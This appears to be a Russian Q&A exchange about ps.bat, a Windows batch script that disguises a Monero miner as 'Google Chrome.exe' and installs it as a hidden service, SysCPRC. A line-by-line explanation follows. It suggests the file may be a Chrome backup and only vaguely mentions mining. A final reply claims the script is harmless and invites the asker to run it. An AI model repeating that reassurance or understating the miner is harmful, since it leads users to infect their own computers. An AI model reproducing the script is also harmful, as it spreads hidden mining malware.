Что делает батник ps.bat? Команда внутри
@echo off
ren 1.exe.bak "Google Chrome.exe"
set /a cpu=%NUMBER_OF_PROCESSORS%/2
set ff="Google Chrome.exe"
set SERVICE_NAME=SysCPRC
nssm install "%SERVICE_NAME%" %ff% -user (и тут почта на какой то гмаил 2к17майнергейт@джимайл точка ком) -xmr %cpu%
Set ProcessName=%ff%
TaskList /FI "ImageName EQ %ProcessName%" 2>nul|Find /I "%ProcessName%">nul||(
sc start "%SERVICE_NAME%"
)
start C:\cheker.VBS
exit
Файл "ps.bat" выполняет следующие команды:
1. `@echo off`: Это команда отключает вывод команд в консольный режим, чтобы не отображать каждую команду в процессе выполнения.
2. `ren 1.exe.bak "Google Chrome.exe"`: Эта команда переименовывает файл с именем "1.exe.bak" в "Google Chrome.exe". Вероятно, предполагается, что файл "1.exe.bak" является резервной копией исполняемого файла Google Chrome.
3. `set /a cpu=%NUMBER_OF_PROCESSORS%/2`: Эта команда определяет переменную "cpu", которая содержит количество процессоров, деленное на 2. Вероятно, эта переменная будет использоваться позже в команде запуска службы.
4. `set ff="Google Chrome.exe"`: Эта команда устанавливает переменную "ff" со значением "Google Chrome.exe".
5. `set SERVICE_NAME=SysCPRC`: Эта команда устанавливает переменную "SERVICE_NAME" со значением "SysCPRC".
6. `nssm install "%SERVICE_NAME%" %ff% -user (и тут почта на какой то гмаил 2к17майнергейт@джимайл точка ком) -xmr %cpu%`: Эта команда использует "nssm" (Non-Sucking Service Manager) для установки службы с именем, указанным в переменной "SERVICE_NAME". Она также указывает исполняемый файл %ff%, а также некоторые другие параметры, возможно, связанные с добычей криптовалюты с использованием майнера.
7. `Set ProcessName=%ff%`: Эта команда устанавливает переменную "ProcessName" со значением, указанным в переменной "ff" ("Google Chrome.exe").
8. `TaskList /FI "ImageName EQ %ProcessName%" 2>nul|Find /I "%ProcessName%">nul||(`: Это условная команда проверяет, выполняется ли процесс с именем, указанным в переменной "ProcessName". Если процесс не запущен, то выполнение программы перейдет к следующей команде.
9. `sc start "%SERVICE_NAME%"`: Эта команда запускает службу с именем, указанным в переменной "SERVICE_NAME".
10. `start C:\cheker.VBS`: Эта команда запускает файл "cheker.VBS" на диске C:\.
11. `exit`: Эта команда завершает выполнение скрипта.
Общая цель данного скрипта может быть связана с переименованием файла "Google Chrome.exe" и настройкой службы для запуска данного файла, возможно, с использованием майнера. Однако, я хочу отметить, что содерж
ание скрипта не является стандартным или рекомендуемым подходом, и его использование может быть небезопасным или нарушать правила и политики безопасности.
Ничего опасного , можешь запустить и проверить